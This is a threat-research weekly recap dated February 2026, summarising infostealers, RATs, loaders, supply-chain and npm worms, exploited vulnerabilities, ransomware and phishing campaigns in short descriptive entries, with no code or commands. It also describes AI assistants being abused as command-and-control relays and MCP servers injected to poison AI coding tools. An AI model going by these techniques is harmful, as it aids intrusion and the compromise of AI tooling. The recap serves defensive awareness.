Threat Research | Weekly Recap [22 Feb 2026]

Cybersecurity Threat Research ‘Weekly’ Recap: This overview highlights infostealers, RATs, supply-chain and CI/AI toolchain compromises, vulnerabilities, ransomware activity, and phishing campaigns, featuring notable actors and families such as CharlieKirk, XWorm, SANDWORM_MODE, QakBot, and Lynx. It also emphasizes trends like AI-driven C2 abuse, adaptive phishing via Telegram, firmware and mobile backdoors, and notable incidents involving Dell RecoverPoint, Ivanti EPMM, BeyondTrust, and SolarWinds WHD. #CharlieKirk #ArkanixStealer #MIMICRAT #ClickFix #LunarApplication #XWorm #TrustConnect #DocConnect #Foxveil #GrayCharlie #AtlassianJira #SANDWORM_MODE #Notepad++ #LotusBlossom #Chrysalis #UNC6201 #DellRecoverPoint #BeyondTrust #IvantiEPMM #SolarWindsWHD #IngressNGINX #QakBot #SinobiRansomware #LynxRansomware #Keenadu #Velociraptor #Cloudflared #DaisyCloud #Redline

CharlieKirk — Python Windows infostealer that harvests browser creds, Discord tokens, Wi‑Fi/game artifacts and exfiltrates via GoFile + Telegram/Discord. CharlieKirk Grabber
Arkanix Stealer — C++ & Python MaaS infostealer (browser wallets/creds) with ChromElevator injector and takedown of panel/payloads. Arkanix Stealer
Infostealer trend — AhnLab January report: SEO-poisoning, macOS churn, and stealer families moving to ECDH+ChaCha20-Poly1305 C2 crypto. January 2026 Infostealer Trend Report
MIMICRAT / ClickFix — Multi-stage site‑compromise chain delivering a native RAT with ETW/AMSI bypass, Lua loader and SOCKS5 tunneling. MIMICRAT / ClickFix
Fake Windows 11 ads (LunarApplication) — Paid Facebook ads redirected to counterfeit installers (ms-update32.exe) that install an Electron app to harvest passwords and crypto wallets. Fake Windows 11 / LunarApplication
macOS music-plugin loader — Cracked DMG distribution delivering multistage loaders (Odyssey, MacSyncStealer) via obfuscated shell scripts and affiliate tracking. macOS music-plugin loader

XWorm — New RAT variant delivered via themed phishing/Excel exploits (CVE-2018-0802) and WSH droppers; AES-encrypted C2, plugin architecture for exfiltration, DDoS and ransomware enablement. XWorm campaigns
TrustConnect / DocConnect — MaaS posing as RMM (EV-signed installers, web dashboard, $300/mo); disrupted C2 but operator pivoted to DocConnect. TrustConnect / DocConnect
Foxveil loader — Initial-stage loader fetching Donut shellcode from Cloudflare/Netlify/Discord, in-memory injection variants and persistence tricks; blocked by SASE controls. Foxveil loader
GrayCharlie — WordPress supply‑chain compromises of law‑firm sites injecting JS redirecting to fake updates/ClickFix lures and NetSupport RATs with follow‑on Stealc/SectopRAT. GrayCharlie / NetSupport RAT
Spam via Atlassian Jira — Disposable Jira Cloud instances abused to send localized spam using Jira Automation and trusted atlassian.net reputation to bypass email defenses. Atlassian Jira spam abuse

SANDWORM_MODE — Shai‑Hulud‑style npm worm propagating through typosquat packages and a malicious GitHub Action, harvesting CI/dev secrets and injecting MCP servers to poison AI coding assistants. SANDWORM_MODE npm worm
Notepad++ / Lotus Blossom & Chrysalis — Long‑running China‑attributed APT using update‑channel and supply‑chain compromises (Chrysalis backdoor); Elastic automation demonstrated rapid incident confirmation for such campaigns. LotusBlossom / Notepad++ supply‑chain
UNC6201 / Dell RecoverPoint — Supply‑side exploitation of Dell RecoverPoint zero‑day enabling Tomcat WAR deployment, lateral movement and new backdoors (GRIMBOLT/BRICKSTORM/SLAYSTYLE). UNC6201 / Dell RecoverPoint

BeyondTrust CVE‑2026‑1731 — Critical pre‑auth RCE in Remote Support exploited to deploy web shells, SparkRAT/VShell and create persistence across sectors; CISA KEV listing and detection guidance available. BeyondTrust CVE‑2026‑1731 exploitation
Ivanti EPMM CVEs — CVE‑2026‑1281 & CVE‑2026‑1340 actively exploited for unauthenticated enterprise MDM takeover, mass scanning and Nezha agent/backdoor installs; urgent patching recommended. Ivanti EPMM critical exploits
SolarWinds Web Help Desk — Internet‑facing WHD exploitation chain observed since Dec 2025 using MSI installs and legitimate tooling (Velociraptor, Cloudflared) for persistence and tunneling. SolarWinds WHD exploitation
Ingress NGINX retirement — Kubernetes Ingress NGINX to be retired after Mar 2026 (no more security fixes); migrate to Gateway API–conformant controllers to avoid exposure (past CVE-2025-1974 example). Ingress NGINX retirement warning

QakBot — Comprehensive IoC analysis names QakBot a top 2026 malware threat: prolific phishing distribution, credential harvest, persistent access and ransomware enablement; downloadable IoC dataset provided. QakBot IoC analysis
Sinobi RaaS — New mid‑2025 RaaS rebrand with Lynx/INC code overlap, closed affiliate model and double‑extortion using Rclone exfil and Curve‑25519/AES encryption. Sinobi ransomware profile
Lynx — Post‑access RDP intrusion leading to rapid discovery, lateral movement, temp.sh exfiltration and ransomware deployment tied to Railnet LLC infrastructure. Lynx ransomware (DFIR)
Access economy — Overview of underground commoditization of logins, cookies, infostealer logs and backdoors (e.g., Redline, DAISY CLOUD) fueling targeted ransomware and breaches. How cybercriminals buy access

AI-in-the-middle C2 — Web‑enabled AI assistants (Grok, Copilot) can be abused as covert C2 relays fetching attacker URLs and returning commands, enabling dynamic AI‑driven malware. AI‑in‑the‑middle C2
OpenClaw runtime risk — Self‑hosted agent runtimes that download/execute untrusted “skills” expand the execution boundary and risk host credential/data exposure; isolate and sandbox if evaluated. OpenClaw identity/isolation guidance
AI‑driven scams (pig butchering) — Automated malvertising + messaging app chatbots exploit lookalike domains to socially engineer victims in Asia, leveraging RDGA‑generated domains at scale. AI‑driven pig‑butchering scams

Keenadu — Firmware‑level Android backdoor injected into libandroid_runtime.so / system apps, persists in Zygote, delivers modular encrypted payloads and links to BADBOX/Triada botnets. Keenadu Android backdoor

Calendar phishing — Spoofed Microsoft/Google Calendar invites with embedded malicious links redirect victims to fake login pages to harvest credentials. Calendar phishing rise
Adaptive phishing → Telegram exfil — HTML active attachments emulate login pages and exfiltrate creds + host metadata to attacker Telegram bots via the Bot API. Adaptive phishing / Telegram exfil

False File Immutability (Redux) — Elastic Security Labs PoC shows FFI exploit via Cloud Files driver to modify in‑use executables and achieve kernel code exec; mitigations and detection rules published. FFI (Redux) exploit & mitigations
Elastic automation for APTs — Attack Discovery + Workflows + Agent Builder collapsed alerts and automated containment for a Chrysalis/Notepad++ update compromise, demonstrating sub‑4‑minute triage. Automated APT detection & response

SHARE THIS STORY